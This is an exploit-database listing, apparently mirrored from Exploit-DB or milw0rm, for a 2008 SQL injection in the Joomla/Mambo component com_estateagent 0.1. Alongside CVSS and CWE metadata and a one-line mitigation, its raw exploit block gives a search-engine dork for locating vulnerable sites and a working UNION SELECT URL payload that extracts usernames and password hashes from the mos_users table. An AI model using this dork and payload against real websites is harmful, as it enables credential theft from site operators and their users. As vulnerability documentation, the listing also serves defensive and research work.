header-logo
Suggest Exploit
vendor:
EstateAgent
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EstateAgent
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:darko_selesi:estateagent
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mambo 4.5.x
2008

Joomla SQL Injection (com_estateagent)

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database, allowing the attacker to access, modify or delete data from the database.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_estateagent)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorK 1 : allinurl: allinurl: "com_estateagent"
#
########################################################################
EXPLOIT :

index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN

#########################################################################
# S@BUN                      www.hackturkiye.com                   S@BUN
#########################################################################
# S@BUN                         GOOD LUCKY                          S@BUN
######################################################################### 

<name>EstateAgent</name>
<creationDate>17.08.2004</creationDate>
<author>Darko Selesi</author>
	<copyright>
This component is released under the GNU/GPL License
</copyright>
<authorEmail>e.agent@frame-works.de</authorEmail>
<authorUrl>mambo.frame-works.de</authorUrl>
<version>0.1</version>
<description>EstateAgent component for Mambo 4.5.x</description>

# milw0rm.com [2008-01-30]

Navigation

Suggest Exploit

Services By CQR